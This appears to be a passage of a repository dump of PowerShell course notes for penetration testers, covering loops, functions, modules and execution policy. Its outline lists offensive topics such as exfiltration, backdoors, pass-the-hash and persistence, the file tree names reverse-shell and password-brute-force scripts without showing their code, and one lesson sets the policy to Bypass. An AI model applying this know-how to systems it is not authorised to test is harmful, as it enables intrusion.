Repository: d1pakda5/PowerShell-for-Pentesters Branch: master Commit: 7176f1025cfc Files: 74 Total size: 1.7 MB Directory structure: gitextract_hail4owi/ ├── .gitignore ├── 1-Course-Introduction.md ├── 10-Loop-Statements-in-Powershell.md ├── 11-Basics-of-Powershell-Scripting.md ├── 12-Functions-in-Powershell-Part-1.md ├── 13-Functions-in-Powershell-Part-2.md ├── 14-Functions-in-Powershell-Part-3.md ├── 15-Advanced-Functions-in-Powershell.md ├── 16-Advanced-Scripting-with-Powershell.md ├── 17-Module-in-Powershell-Part-1.md ├── 18-Modules-in-Powershell-Part-2.md ├── 19-Modules-in-Powershell-Part-3.md ├── 2-Introduction-to-Powershell.md ├── 20-Remoting-Part-1.md ├── 21-Remoting-Part-2.md ├── 22-Powershell-Remoting-Part-3.md ├── 23-Powershell-Remoting-Part-4.md ├── 24-Powershell-Remoting-Part-5.md ├── 25-Powershell-Remoting-Part-6.md ├── 26-Jobs-in-Powershell.md ├── 27-Using-NET-in-Powershell-Part-1.md ├── 28-Using-NET-in-Powershell-Part-2.md ├── 29-Using-NET-in-Powershell-Part-3.md ├── 3-Exploring-and-using-Cmdlets.md ├── 30-Using-NET-in-Powershell-Part-4.md ├── 31-Using-NET-in-Powershell-Part-5.md ├── 32-Using-WMI-in-Powershell-Part-1.md ├── 33-Using-WMI-in-Powershell-Part-2.md ├── 34-Using-WMI-in-Powershell-Part-3.md ├── 35-COM-and-Powershell.md ├── 36-Registry-and-Powershell-Part-1.md ├── 37-Registry-and-Powershell-Part-2.md ├── 38-Registry-and-Powershell-Part-3.md ├── 39-Pentest-Methodology.md ├── 4-Output-Formatting.md ├── 40-Recon-and-Scanning-Part-1.md ├── 41-Recon-and-Scanning-Part-2.md ├── 42-Vulnerability-Scanning-and-Analysis.md ├── 43-Bruteforce-Part-1.md ├── 44-Bruteforce-Part-2.md ├── 45-Exploitation-Executing-Scripts-on-MySQL.md ├── 46-Client-Side-Attacks-Part-1.md ├── 47-Client-Side-Attacks-Part-2.md ├── 48-Client-Side-Attacks-Part-3.md ├── 49-Client-Side-Attacks-Part-4.md ├── 5-Operators.md ├── 50-PHPMyAdmin-Part-1.md ├── 51-PHPMyAdmin-Part-2.md ├── 52-Metasploit-Part-1.md ├── 53-Metasploit-Part-2.md ├── 6-Advanced-Operators.md ├── 7-Types-in-Powershell.md ├── 8-Arrays-in-Powershell.md ├── 9-Conditional-Statements-in-Powershell.md ├── Code/ │ ├── 11/ │ │ └── HelloWorld.ps1 │ ├── 15/ │ │ └── paramatrributes.ps1 │ ├── 16/ │ │ └── Show-AdvancedScript.ps1 │ ├── 18/ │ │ ├── Check-PassTheHash.psm1 │ │ └── Show-AdvancedScript.psm1 │ ├── 19/ │ │ └── Show-AdvancedScript.psd1 │ ├── 23/ │ │ └── Search-Sensitive.ps1 │ ├── 29/ │ │ └── Invoke-SysCommands.ps1 │ ├── 30/ │ │ └── Invoke-SysCommandsDLL.ps1 │ ├── 31/ │ │ └── New-SymLink.ps1 │ ├── 35/ │ │ └── Ie-Com.ps1 │ ├── 41/ │ │ ├── Get-DefaultPage.ps1 │ │ └── ip.txt │ ├── 42/ │ │ └── Start-AutoNmap.ps1 │ ├── 44/ │ │ └── Get-WinRMPassword.ps1 │ ├── 47/ │ │ └── mini-reverse.ps1 │ ├── 49/ │ │ └── Out-ShortcutModified.ps1 │ └── 51/ │ ├── Convert-Dll.ps1 │ └── lib_mysqludf_sys.dll_ └── README.md ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ .DS_Store ================================================ FILE: 1-Course-Introduction.md ================================================ #### 1. Course Introduction - [Nishang](https://github.com/samratashok/nishang) ✅ Helps in using ```PowerShell``` for ```Penetration Testing``` - [Kautilya](https://github.com/samratashok/Kautilya) Toolkit for using ```Human Interface Devices``` in ```Penetration Tests``` - Introduction to PowerShell - Basics of PowerShell - Scripting - Advanced Scripting Concepts - Modules - Jobs - PowerShell with .Net - Using Windows API with PowerShell - PowerShell and WMI - Working with COM objects - Interacting with the Registry ###### Uses of PowerShell - Recon and Scanning - Exploitation - Brute Forcing - Client Side Attacks - Using existing exploitation techniques - Porting exploits to PowerShell – When and how - Human Interface Device - PowerShell and Metasploit - Running PowerShell scripts - Using PowerShell in Metasploit exploits - Post Exploitation - Information Gathering and Exfiltration - Backdoors - Privilege Escalation - Getting system secrets - Post Exploitation - Passing the hashes/credentials - PowerShell Remoting - WMI and WSMAN for remote command execution - Web Shells - Achieving Persistence - Using PowerShell with other security tools - Defense against PowerShell attacks ================================================ FILE: 10-Loop-Statements-in-Powershell.md ================================================ #### 10. Loop Statements in Powershell ###### Loop Statements - while() {} ```PowerShell PS C:\Users\Windows-32> $count = 3 PS C:\Users\Windows-32> while ( $count -ge 0 ) >> { >> "Iteration $count" >> $count-- >> } >> Iteration 3 Iteration 2 Iteration 1 Iteration 0 PS C:\Users\Windows-32> ``` - do {} while() - do {} until() - for(;;){} - foreach ( in ){} ```PowerShell PS C:\Users\Windows-32> $process = Get-Process PS C:\Users\Windows-32> foreach ( $i in $process ) { >> $i.Name >> } >> cmd conhost conhost csrss csrss dwm explorer Idle jusched lsass lsm notepad++ powershell PresentationFontCache python SearchIndexer services smss spoolsv svchost svchost svchost svchost svchost svchost svchost svchost svchost svchost svchost svchost System taskhost VBoxService VBoxTray wininit winlogon wmpnetwk wuauclt PS C:\Users\Windows-32> ``` ###### Loop Cmdlets - ForEach-Object ```PowerShell PS C:\Users\Windows-32> Get-Process | ForEach-Object {$_.Name} cmd conhost conhost csrss csrss dwm explorer Idle jusched lsass lsm notepad++ powershell PresentationFontCache python SearchFilterHost SearchIndexer SearchProtocolHost services smss spoolsv svchost svchost svchost svchost svchost svchost svchost svchost svchost svchost svchost svchost System taskhost VBoxService VBoxTray wininit winlogon wmpnetwk wuauclt PS C:\Users\Windows-32> ``` - Where-Object ```PowerShell PS C:\Users\Windows-32> Get-ChildItem C:\Users\Windows-32 | Where-Object { $_.Name -match "txt" } Directory: C:\Users\Windows-32 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/6/2017 9:20 PM 10 text.txt PS C:\Users\Windows-32> ``` ###### Exercise Iterate through the processes running on your computer and print the path of the executable for each process. ```PowerShell PS C:\Users\Administrator> Get-Process | ForEach-Object {$_.Name, $_.Path} cmd C:\Windows\system32\cmd.exe conhost C:\Windows\system32\conhost.exe conhost C:\Windows\system32\conhost.exe csrss csrss dfsrs C:\Windows\system32\DFSRs.exe dfssvc C:\Windows\system32\dfssvc.exe dns C:\Windows\system32\dns.exe dwm C:\Windows\system32\dwm.exe explorer C:\Windows\Explorer.EXE firefox C:\Program Files\Mozilla Firefox\firefox.exe firefox C:\Program Files\Mozilla Firefox\firefox.exe Idle ismserv C:\Windows\System32\ismserv.exe lsass C:\Windows\system32\lsass.exe Microsoft.ActiveDirectory.WebServices C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe msdtc C:\Windows\System32\msdtc.exe notepad C:\Windows\system32\NOTEPAD.EXE powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe python C:\Python27\python.exe services smss spoolsv C:\Windows\System32\spoolsv.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\System32\svchost.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\system32\svchost.exe svchost C:\Windows\System32\svchost.exe System taskhostex C:\Windows\system32\taskhostex.exe VBoxService C:\Windows\System32\VBoxService.exe VBoxTray C:\Windows\System32\VBoxTray.exe vds C:\Windows\System32\vds.exe wininit C:\Windows\system32\wininit.exe winlogon C:\Windows\system32\winlogon.exe wlms C:\Windows\system32\wlms\wlms.exe PS C:\Users\Administrator> ``` ================================================ FILE: 11-Basics-of-Powershell-Scripting.md ================================================ #### 11. Basics of Powershell Scripting ###### PowerShell Scripting - Write, Save, Execute - Execution Policy is ```NOT a security control``` ```Powershell``` script ```PowerShell PS C:\Users\Windows-32\Desktop> cat .\HelloWorld.ps1 "Hello World" PS C:\Users\Windows-32\Desktop> ``` Unable to execute ```Powershell``` script because of ```ExecutionPolicy``` ```PowerShell PS C:\Users\Windows-32> cd .\Desktop PS C:\Users\Windows-32\Desktop> .\HelloWorld.ps1 File C:\Users\Windows-32\Desktop\HelloWorld.ps1 cannot be loaded because the execution of scripts is disabled on this system. Please see "get-help about_signing" for more details. At line:1 char:17 + .\HelloWorld.ps1 <<<< + CategoryInfo : NotSpecified: (:) [], PSSecurityException + FullyQualifiedErrorId : RuntimeException PS C:\Users\Windows-32\Desktop> ``` ```PowerShell PS C:\Users\Windows-32\Desktop> Get-ExecutionPolicy Restricted PS C:\Users\Windows-32\Desktop> ``` ```PowerShell PS C:\Users\Windows-32\Desktop> Get-Help about_Execution_Policies TOPIC about_Execution_Policies SHORT DESCRIPTION Describes the Windows PowerShell execution policies and explains how to manage them. LONG DESCRIPTION Windows PowerShell execution policies let you determine the conditions under which Windows PowerShell loads configuration files and runs scripts. You can set an execution policy for the local computer, for the current user, or for a particular session. You can also use a Group Policy setting to set execution policy for computers and users. Execution policies for the local computer and current user are stored in the registry. You do not need to set execution policies in your Windows PowerShell profile. The execution policy for a particular session is stored only in memory and is lost when the session is closed. The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally. WINDOWS POWERSHELL EXECUTION POLICIES ------------------------------------- The Windows PowerShell execution policies are as follows: "Restricted" is the default policy. Restricted - Default execution policy. - Permits individual commands, but will not run scripts. - Prevents running of all script files, including formatting and configuration files (.ps1xml), module script files (.psm1), and Windows PowerShell profiles (.ps1). AllSigned - Scripts can run. - Requires that all scripts and configuration files be signed by a trusted publisher, including scripts that you write on the local computer. - Prompts you before running scripts from publishers that you have not yet classified as trusted or untrusted. - Risks running unsigned scripts from sources other than the Internet and signed, but malicious, scripts. RemoteSigned - Scripts can run. - Requires a digital signature from a trusted publisher on scripts and configuration files that are downloaded from the Internet (including e-mail and instant messaging programs). - Does not require digital signatures on scripts that you have run and that you have written on the local computer (not downloaded from the Internet). - Risks running signed, but malicious, scripts. Unrestricted - Unsigned scripts can run. (This risks running malicious scripts.) - Warns the user before running srcipts and configuration files that are downloaded from the Internet. Bypass - Nothing is blocked and there are no warnings or prompts. - This execution policy is designed for configurations in which a Windows PowerShell script is built in to a a larger application or for configurations in which Windows PowerShell is the foundation for a program that has its own security model. Undefined - There is no execution policy set in the current scope. - If the execution policy in all scopes is Undefined, the effective execution policy is Restricted, which is the default execution policy. Note: On systems that do not distinguish Universal Naming Convention (UNC) paths from Internet paths, scripts that are identified by a UNC path might not be permitted to run with the RemoteSigned execution policy. EXECUTION POLICY SCOPE ---------------------- You can set an execution policy that is effective only in a particular scope. The valid values for Scope are Process, CurrentUser, and LocalMachine. LocalMachine is the default when setting an execution policy. The Scope values are listed in precedence order. - Process The execution policy affects only the current session (the current Windows PowerShell process). The execution policy is stored in the $PSExecutionPolicyPreference environment variable. This value is deleted when the session in which the policy is set is closed. - CurrentUser The execution policy affects only the current user. It is stored in the HKEY_CURRENT_USER registry subkey. - LocalMachine The execution policy affects all users on the current computer. It is stored in the HKEY_LOCAL_MACHINE registry subkey. The policy that takes precedence is effective in the current session, even if a more restrictive policy was set at a lower level of precedence. For more information, see Set-ExecutionPolicy. GET YOUR EXECUTION POLICY ------------------------------ To get the Windows PowerShell execution policy that is in effect in the current session, use the Get-ExecutionPolicy cmdlet. The following command gets the current execution policy: get-executionpolicy To get all of the execution policies that affect the current session and displays them in precedence order, type: get-executionpolicy -list The result will look similar to the following sample output: Scope ExecutionPolicy ----- --------------- MachinePolicy Undefined UserPolicy Undefined Process Undefined CurrentUser RemoteSigned LocalMachine AllSigned In this case, the effective execution policy is RemoteSigned because the execution policy for the current user takes precedence over the execution policy set for the local computer. To get the execution policy set for a particular scope, use the Scope parameter of Get-ExecutionPolicy. For example, the following command gets the execution policy for the current user scope. get-executionpolicy -scope CurrentUser CHANGE YOUR EXECUTION POLICY ------------------------------ To change the Windows PowerShell execution policy on your computer, use the Set-ExecutionPolicy cmdlet. The change is effective immediately; you do not need to restart Windows PowerShell. If you set the execution policy for the local computer (the default) or the current user, the change is saved in the registry and remains effective until you change it again. If you set the execution policy for the current process, it is not saved in the registry. It is retained until the current process and any child processes are closed. Note: In Windows Vista and later versions of Windows, to run commands that change the execution policy for the local computer (the default), start Windows PowerShell with the "Run as administrator" option. To change your execution policy, type: Set-ExecutionPolicy For example: Set-ExecutionPolicy RemoteSigned To set the execution policy in a particular scope, type: Set-ExecutionPolicy -scope For example: Set-ExecutionPolicy RemoteSigned -scope CurrentUser A command to change an execution policy can succeed but still not change the effective execution policy. For example, a command that sets the execution policy for the local computer can succeed but be overridden by the execution policy for the current user. REMOVE YOUR EXECUTION POLICY ---------------------------- To remove the execution policy for a particular scope, set the value of the value of the execution policy to Undefined. For example, to remove the execution policy for all the users of the local computer, type: set-executionpolicy Undefined Or, type: set-executionpolicy Undefined -scope LocalMachine If no execution policy is set in any scope, the effective execution policy is Restricted, which is the default. SET AN EXECUTION POLICY IN POWERSHELL.EXE ----------------------------------------- You can use the ExecutionPolicy parameter of PowerShell.exe to set an execution policy for a new Windows PowerShell session. The policy affects only the current session and child sessions. To set the execution policy for a new session, start Windows PowerShell at the command line (such as Cmd.exe or Windows PowerShell), and then use the ExecutionPolicy parameter of PowerShell.exe to set the execution policy. For example: powershell.exe -executionpolicy -allsigned The execution policy that you set is not stored in the registry. Instead, it is stored in the $PSExecutionPolicyPreference environment variable. The variable is deleted when you close the session in which the policy is set. During the session, the execution policy that is set for the session takes precedence over an execution policy that is set in the registry for the local computer or current user. However, it does not take precedence over the execution policy set by using a Group Policy setting (discussed below). USE GROUP POLICY TO MANAGE EXECUTION POLICY ------------------------------------------- You can use the "Turn on Script Execution" Group Policy setting to manage the execution policy of computers in your enterprise. The Group Policy setting overrides the execution policies set in Windows PowerShell in all scopes. The "Turn on Script Execution" policy settings are as follows: -- If you disable "Turn on Script Execution", scripts do not run. This is equivalent to the "Restricted" execution policy. -- If you enable "Turn on Script Execution", you can select an execution policy. The Group Policy settings are equivalent to the following execution policy settings. Group Policy Execution Policy ------------ ---------------- Allow all scripts. Unrestricted Allow local scripts RemoteSigned and remote signed scripts. Allow only signed AllSigned scripts. -- If "Turn on Script Execution" is not configured, it has no effect. The execution policy set in Windows PowerShell is effective. The PowerShellExecutionPolicy.adm file adds the "Turn on Script Execution" policy to the Computer Configuration and User Configuration nodes in Group Policy Editor in the following paths. For Windows XP and Windows Server 2003: Administrative Templates\Windows Components\Windows PowerShell For Windows Vista and later versions of Windows: Administrative Templates\Classic Administrative Templates\ Windows Components\Windows PowerShell Policies set in the Computer Configuration node take precedence over policies set in the User Configuration node. The PowerShellExecutionPolicy.adm file is available on the Microsoft Download Center. For more information, see "Administrative Templates for Windows PowerShell" at http://go.microsoft.com/fwlink/?LinkId=131786. EXECUTION POLICY PRECEDENCE --------------------------- When determining the effective execution policy for a session, Windows PowerShell evaluates the execution policies in the following precedence order: - Group Policy: Computer Configuration - Group Policy: User Configuration - Execution Policy: Process (or PowerShell.exe -ExecutionPolicy) - Execution Policy: CurrentUser - Execution Policy: LocalMachine MANAGE SIGNED AND UNSIGNED SCRIPTS ---------------------------------- If your Windows PowerShell execution policy is RemoteSigned, Windows PowerShell will not run unsigned scripts that are downloaded from the Internet (including e-mail and instant messaging programs). You can sign the script or elect to run an unsigned script without changing the execution policy. For more information, see about_Signing. SEE ALSO Get-ExecutionPolicy Set-ExecutionPolicy about_Signing "Administrative Templates for Windows PowerShell" (http://go.microsoft.com/fwlink/?LinkId=131786) PS C:\Users\Windows-32\Desktop> ``` In an ```Administrative``` Powershell prompt ```PowerShell PS C:\Windows\system32> Set-ExecutionPolicy Bypass Execution Policy Change The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help topic. Do you want to change the execution policy? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y PS C:\Windows\system32> ``` ```PowerShell PS C:\Users\Windows-32\Desktop> .\HelloWorld.ps1 Hello World PS C:\Users\Windows-32\Desktop> ``` ================================================ FILE: 12-Functions-in-Powershell-Part-1.md ================================================ #### 12. Functions in Powershell Part 1 ###### Functions - Simple usage ```PowerShell PS C:\Users\Windows-32\Desktop> function add { 1 + 3 } PS C:\Users\Windows-32\Desktop> add 4 PS C:\Users\Windows-32\Desktop> ``` - Parameters of a PowerShell function. - $args ```PowerShell PS C:\Users\Windows-32\Desktop> function paramshow { $args } PS C:\Users\Windows-32\Desktop> paramshow PS C:\Users\Windows-32\Desktop> paramshow "Hi" Hi PS C:\Users\Windows-32\Desktop> paramshow 666 666 PS C:\Users\Windows-32\Desktop> ``` ```PowerShell PS C:\Users\Windows-32\Desktop> function paramadd { $args[0] + $args[1] } PS C:\Users\Windows-32\Desktop> paramadd 3 7 10 PS C:\Users\Windows-32\Desktop> ``` - Declaring parameters ```PowerShell PS C:\Users\Windows-32\Desktop> function newFunction ( $num1, $num2 ) { $num1 * $num2 } PS C:\Users\Windows-32\Desktop> newFunction 2 6 12 PS C:\Users\Windows-32\Desktop> ``` - Positional and named parameters ```PowerShell PS C:\Users\Windows-32\Desktop> function posfunc ($param1, $param2) { $param1 } PS C:\Users\Windows-32\Desktop> posfunc -param1 2 -param2 4 2 PS C:\Users\Windows-32\Desktop> posfunc 2 4 2 PS C:\Users\Windows-32\Desktop> posfunc -param2 2 -param1 4 4 PS C:\Users\Windows-32\Desktop> ``` ================================================ FILE: 13-Functions-in-Powershell-Part-2.md ================================================ #### 13. Functions in Powershell Part 2 - Dynamic number of Parameters ```PowerShell PS C:\Users\Windows-32> function fixed_params ($a, $b) { >> $a >> $b >> } >> PS C:\Users\Windows-32> fixed_params 2 4 2 4 PS C:\Users\Windows-32> fixed_params 2 4 7 2 4 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> function var_params ($a, $b) { >> $a >> $b >> $args >> } >> PS C:\Users\Windows-32> var_params 1 2 4 5 7 1 2 4 5 7 PS C:\Users\Windows-32> ``` - Type declaration of the Parameters ```PowerShell PS C:\Users\Windows-32> function addInt ([int]$a, [int]$b) { $a + $b } PS C:\Users\Windows-32> addInt 3 6 9 PS C:\Users\Windows-32> ``` - Default Values ```PowerShell PS C:\Users\Windows-32> function default_value ($a=8, $b) { >> $a >> $b >> } >> PS C:\Users\Windows-32> default_value 8 PS C:\Users\Windows-32> default_value 7 5 7 5 PS C:\Users\Windows-32> ``` ================================================ FILE: 14-Functions-in-Powershell-Part-3.md ================================================ #### 14. Functions in Powershell Part 3 - Switch Parameters ```PowerShell PS C:\Users\Windows-32> function switchable ($a, $b, [switch]$flip) { >> $a + $b >> if ($flip) { $a - $b } >> } >> PS C:\Users\Windows-32> switchable 1 2 3 PS C:\Users\Windows-32> switchable 1 2 -flip 3 -1 PS C:\Users\Windows-32> ``` - Returning values ```PowerShell PS C:\Users\Windows-32> $output = switchable 1 4 PS C:\Users\Windows-32> $output 5 PS C:\Users\Windows-32> ``` - Scope of variables and functions ```PowerShell PS C:\Users\Windows-32> $var1 = 33 PS C:\Users\Windows-32> function fun1 ($var1 = 22) {$var1} PS C:\Users\Windows-32> $var1 33 PS C:\Users\Windows-32> fun1 22 PS C:\Users\Windows-32> $var1 33 PS C:\Users\Windows-32> ``` - List all function ```PowerShell PS C:\Users\Windows-32> ls function: CommandType Name ----------- ---- Function A: Function addInt Function B: Function C: Function cd.. Function cd\ Function Clear-Host Function D: Function default_value Function Disable-PSRemoting Function E: Function F: Function fixed_params Function fun1 Function G: Function Get-Verb Function H: Function help Function I: Function ImportSystemModules Function J: Function K: Function L: Function M: Function mkdir Function more Function N: Function O: Function P: Function prompt Function Q: Function R: Function S: Function switchable Function T: Function TabExpansion Function U: Function V: Function var_params Function W: Function X: Function Y: Function Z: PS C:\Users\Windows-32> ``` ###### Exercise - Create a function which accepts name of a process or service and stops it. ```PowerShell PS C:\Users\Windows-32> Start-Process notepad PS C:\Users\Windows-32> function ProcessStop ($name) { Stop-Process -Name $name } PS C:\Users\Windows-32> ProcessStop "notepad" PS C:\Users\Windows-32> ``` - Use a switch variable in the above function to add the ability of stopping a service as well. ```PowerShell PS C:\Windows\system32> function ProcessStop ($name1, $name2, [switch]$flip) { >> Stop-Process -Name $name1 >> if ($flip) { Stop-Service $name2 } >> } >> PS C:\Windows\system32> ProcessStop "notepad" "WwanSvc" -flip PS C:\Windows\system32> ``` - Accept a PID parameter too. If a PID is passed to the function, attempt should be made only to stop a process. ```PowerShell PS C:\Windows\system32> function ProcessStop ($name1, $name2, $p_id, [switch]$flip) { >> if ($p_id) { Stop-Process $p_id } >> else { Stop-Process -Name $name1 } >> if ($flip) { Stop-Service $name2 } >> } >> PS C:\Windows\system32> ``` ```PowerShell PS C:\Windows\system32> Start-Process notepad PS C:\Windows\system32> Start-Process calc PS C:\Windows\system32> Get-Process notepad Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 56 3 920 4220 55 0.04 2868 notepad PS C:\Windows\system32> Get-Process calc Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 70 7 5236 9276 67 0.05 3684 calc PS C:\Windows\system32> ``` ```PowerShell PS C:\Windows\system32> ProcessStop "calc" "" 2868 ``` ```PowerShell PS C:\Windows\system32> Get-Process notepad Get-Process : Cannot find a process with the name "notepad". Verify the process name and call the cmdlet again. At line:1 char:12 + Get-Process <<<< notepad + CategoryInfo : ObjectNotFound: (notepad:String) [Get-Process], ProcessCommandException + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand PS C:\Windows\system32> ``` ```PowerShell PS C:\Windows\system32> Get-Process calc Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 70 7 5236 9276 67 0.05 3684 calc PS C:\Windows\system32> ``` ================================================ FILE: 15-Advanced-Functions-in-Powershell.md ================================================ #### 15. Advanced Functions in Powershell ###### Advanced Functions - param statement - Parameter attributes - Mandatory - ```ParameterSetName``` - closest to ```function overloading``` - Position - ValueFromPipeline - Parameter Validation - AllowEmptyString - AllowNull - AllowEmptyCollection - ValidateLength - ValidatePattern - ValidateSet - ```paramatrributes.ps1``` ```PowerShell function advancedfunction { param ( [Parameter (Mandatory = $True, Position = 0, ValueFromPipeline = $True, ParameterSetName="ParamSet1")] [ValidateSet(1,2,3)] # [AllowNull()] $a, [Parameter (Position = 1)] $b ) Write-Output "a is $a" Write-Output "b is $b" } ``` ```PowerShell PS C:\Users\Administrator\Desktop\15> ls Directory: C:\Users\Administrator\Desktop\15 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/10/2017 6:25 PM 306 paramatrributes.ps1 PS C:\Users\Administrator\Desktop\15> ``` - ```Dot Sourcing``` ```PowerShell PS C:\Users\Administrator\Desktop\15> . .\paramatrributes.ps1 ``` ```PowerShell PS C:\Users\Administrator\Desktop\15> paramattributes 1 2 a is 1 b is 2 PS C:\Users\Administrator\Desktop\15> ``` ```PowerShell PS C:\Users\Administrator\Desktop\15> paramattributes -a 2 -b 6 a is 2 b is 6 PS C:\Users\Administrator\Desktop\15> ``` ```PowerShell PS C:\Users\Administrator\Desktop\15> paramattributes cmdlet paramattributes at command pipeline position 1 Supply values for the following parameters: a: 3 b: 4 a is 3 b is 4 PS C:\Users\Administrator\Desktop\15> ``` ```PowerShell PS C:\Users\Administrator\Desktop\15> 1 | paramattributes -b 7 a is 1 b is 7 PS C:\Users\Administrator\Desktop\15> ``` ```PowerShell PS C:\Users\Administrator\Desktop\15> paramattributes -a $null -b 6 ``` ================================================ FILE: 16-Advanced-Scripting-with-Powershell.md ================================================ #### 16. Advanced Scripting with Powershell ###### PowerShell Scripting - Dot sourcing - CmdletBinding - Verbose Output - Parameter Checks - SupportsShouldProcess (```-WhatIf``` and ```-Confirm```) - ```Show-AdvancedScript.ps1``` ```Powershell function Show-AdvancedScript { [CmdletBinding( SupportsShouldProcess = $True)] param( [Parameter()] $FilePath ) Write-Verbose "Deleting $FilePath" if ($PSCmdlet.ShouldProcess("$Filepath", "Deleting file permanently")) { Remove-Item $FilePath } } ``` ```Powershell PS C:\Users\Windows10-32> C:\Users\Windows10-32\Desktop\Show-AdvancedScript.ps1 ``` ```Powershell PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\1.txt ``` ```Powershell PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\2.txt -Verbose VERBOSE: Deleting .\2.txt VERBOSE: Performing the operation "Deleting file permanently" on target ".\2.txt". PS C:\Users\Windows10-32> ``` ```Powershell PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\3.txt -WhatIf What if: Performing the operation "Deleting file permanently" on target ".\3.txt". PS C:\Users\Windows10-32> ``` ```Powershell PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\3.txt -Confirm ``` ================================================ FILE: 17-Module-in-Powershell-Part-1.md ================================================ #### 17. Module in Powershell Part 1 ###### Modules - Help topic for ```module``` ```PowerShell PS C:\Users\Windows10-32> Get-Help *module* Name Category Module Synopsis ---- -------- ------ -------- ImportSystemModules Function ... Export-ModuleMember Cmdlet Microsoft.PowerShell.Core ... Get-Module Cmdlet Microsoft.PowerShell.Core ... Import-Module Cmdlet Microsoft.PowerShell.Core ... New-Module Cmdlet Microsoft.PowerShell.Core ... New-ModuleManifest Cmdlet Microsoft.PowerShell.Core ... Remove-Module Cmdlet Microsoft.PowerShell.Core ... Test-ModuleManifest Cmdlet Microsoft.PowerShell.Core ... InModuleScope Function Pester ... Uninstall-Module Function PowerShellGet ... Install-Module Function PowerShellGet ... Publish-Module Function PowerShellGet ... Update-ModuleManifest Function PowerShellGet ... Save-Module Function PowerShellGet ... Update-Module Function PowerShellGet ... Get-InstalledModule Function PowerShellGet ... Find-Module Function PowerShellGet ... PS C:\Users\Windows10-32> ``` - Listing Modules ```PowerShell PS C:\Users\Windows10-32> Get-Module -ListAvailable -All Directory: C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 1.0.1 Example2.Diagnostics Directory: C:\Program Files\WindowsPowerShell\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Binary 0.0.0.0 Microsoft.PackageManagement Binary 0.0.0.0 Microsoft.PackageManagement.Arch... Binary 0.0.0.0 Microsoft.PackageManagement.Core... Binary 0.0.0.0 Microsoft.PackageManagement.Meta... Binary 0.0.0.0 Microsoft.PackageManagement.MsiP... Binary 0.0.0.0 Microsoft.PackageManagement.MsuP... Script 1.0.1 Microsoft.PowerShell.Operation.V... {Get-OperationValidation, Invoke-OperationValidation} Script 1.0.1 Microsoft.PowerShell.Operation.V... {Get-OperationValidation, Invoke-OperationValidation} Binary 3.0.0.0 Microsoft.PowerShell.PackageMana... {Find-Package, Get-Package, Get-PackageProvider, Get-PackageSource...} Binary 3.0.0.0 Microsoft.PowerShell.PSReadline {Get-PSReadlineOption, Set-PSReadlineOption, Set-PSReadlineKeyHandler, Get-PSReadlineKeyHandler...} Manifest 0.0 OperationValidationResources Binary 1.0.0.1 PackageManagement {Find-Package, Get-Package, Get-PackageProvider, Get-PackageSource...} Script 0.0 PackageProviderFunctions {Write-Debug, Write-Error, Write-Progress, Write-Verbose...} Script 3.4.0 Pester {Describe, Context, It, Should...} Script 3.4.0 Pester {Describe, Context, It, Should...} Script 1.0.0.1 PowerShellGet {Install-Module, Find-Module, Save-Module, Update-Module...} Script 1.0.0.1 PowerShellGet {Install-Module, Find-Module, Save-Module, Update-Module...} Manifest 0.0 PSGet.Resource Script 1.2 PSReadline {Get-PSReadlineKeyHandler, Set-PSReadlineKeyHandler, Remove-PSReadlineKeyHandler, Get-PSReadlineOption...} Script 0.0 PSReadline {Get-PSReadlineOption, Set-PSReadlineKeyHandler, Get-PSReadlineKeyHandler, Set-PSReadlineOption...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 1.0.0.0 AppBackgroundTask {Disable-AppBackgroundTaskDiagnosticLog, Enable-AppBackgroundTaskDiagnosticLog, Set-AppBackgroundTaskResourcePolicy, Unregister-AppBackground... Manifest 2.0.0.0 AppLocker {Get-AppLockerFileInformation, Get-AppLockerPolicy, New-AppLockerPolicy, Set-AppLockerPolicy...} Manifest 1.0.0.0 AppvClient {Add-AppvClientConnectionGroup, Add-AppvClientPackage, Add-AppvPublishingServer, Disable-Appv...} Script 0.0 AppVClientCmdlets {Get-AppvVirtualProcess, Start-AppvVirtualProcess} Manifest 2.0.0.0 Appx {Add-AppxPackage, Get-AppxPackage, Get-AppxPackageManifest, Remove-AppxPackage...} Script 0.0 Appx {Get-AppxLastError, Get-AppxLog} Script 1.0.0.0 AssignedAccess {Clear-AssignedAccess, Get-AssignedAccess, Set-AssignedAccess} Script 0.0 AssignedAccess {Get-AssignedAccess, Set-AssignedAccess, Clear-AssignedAccess} Manifest 1.0.0.0 BitLocker {Unlock-BitLocker, Suspend-BitLocker, Resume-BitLocker, Remove-BitLockerKeyProtector...} Script 1.0.0.0 BitLocker {Unlock-BitLocker, Suspend-BitLocker, Resume-BitLocker, Remove-BitLockerKeyProtector...} Manifest 2.0.0.0 